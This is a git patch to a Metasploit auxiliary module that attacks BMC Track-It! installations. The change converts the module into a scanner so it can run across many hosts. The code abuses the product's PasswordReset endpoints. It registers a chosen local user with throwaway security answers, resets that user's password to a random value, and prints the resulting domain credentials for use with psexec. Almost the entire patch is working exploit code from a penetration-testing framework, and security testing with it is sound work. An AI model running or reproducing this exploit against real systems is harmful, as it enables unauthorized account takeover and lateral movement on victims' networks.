From 0a29326ce7e3169dbce949b4b6d4d994a911dc54 Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Thu, 11 Dec 2014 14:44:48 -0800
Subject: [PATCH] Mixin Scanner. Yay speed!

---
 .../gather/bmc_trackit_passwd_reset.rb        | 35 +++++++++++--------
 1 file changed, 21 insertions(+), 14 deletions(-)

diff --git a/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb b/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
index 9f4fdcb9f1..40a525e593 100644
--- a/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
+++ b/modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
@@ -9,6 +9,7 @@ class Metasploit4 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
 
   def initialize(info = {})
     super(update_info(info,
@@ -38,26 +39,31 @@ class Metasploit4 < Msf::Auxiliary
       ], self.class)
   end
 
-  def run
-    res = send_request_cgi({
+  def localuser
+    datastore['LOCALUSER']
+  end
+
+  def run_host(ip)
+    res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'PasswordReset'),
-    })
+    )
 
     unless res
-      fail_with(Failure::Unknown, "Could not contact server")
+      print_error("#{peer}: Could not contact server")
+      return
     end
 
     cookies = res.get_cookies
     domain = $1 if res.body =~ /"domainName":"(.*)"\}\);/
     domain = datastore['DOMAIN'] if datastore['DOMAIN'] != ''
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'Register'),
       'method' => 'POST',
       'cookie' => cookies,
       'vars_post' => {
         'domainname' => domain,
-        'userName' => datastore['LOCALUSER'],
+        'userName' => localuser,
         'emailaddress' => Rex::Text.rand_text_alpha(8) + '@' + Rex::Text.rand_text_alpha(8) + '.com',
         'userQuestions' => '[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]',
         'updatequesChk' => 'false',
@@ -68,10 +74,11 @@ class Metasploit4 < Msf::Auxiliary
         'confirmanswer' => 'not',
         'confirmanswer' => 'not'
       }
-    })
+    )
 
-    if !res or res.body != "{\"success\":true,\"data\":{\"userUpdated\":true}}"
-      fail_with(Failure::Unknown, "Could not register the user.")
+    if !res || res.body != "{\"success\":true,\"data\":{\"userUpdated\":true}}"
+      print_error("#{peer}: Could not register the #{localuser} user")
+      return
     end
 
     password = Rex::Text.rand_text_alpha(10) + "!1"
@@ -83,16 +90,16 @@ class Metasploit4 < Msf::Auxiliary
       'vars_post' => {
         'newPassword' => password,
         'domain' => domain,
-        'UserName' => datastore['LOCALUSER'],
+        'UserName' => localuser,
         'CkbResetpassword' => 'true'
       }
     })
 
-    if !res or res.body != '{"success":true,"data":{"PasswordResetStatus":0}}'
-      fail_with(Failure::Unknown, "Could not change the user's password. Is it a domain or local user?")
+    if !res || res.body != '{"success":true,"data":{"PasswordResetStatus":0}}'
+      print_error("#{peer}: Could not change #{localuser}'s password -- is it a domain or local user?")
+      return
     end
 
-    print_status("Please run the psexec module using:")
-    print_status("#{domain}\\#{datastore['LOCALUSER']}:#{password}")
+    print_good("#{peer} Please run the psexec module using #{domain}\\#{localuser}:#{password}")
   end
 end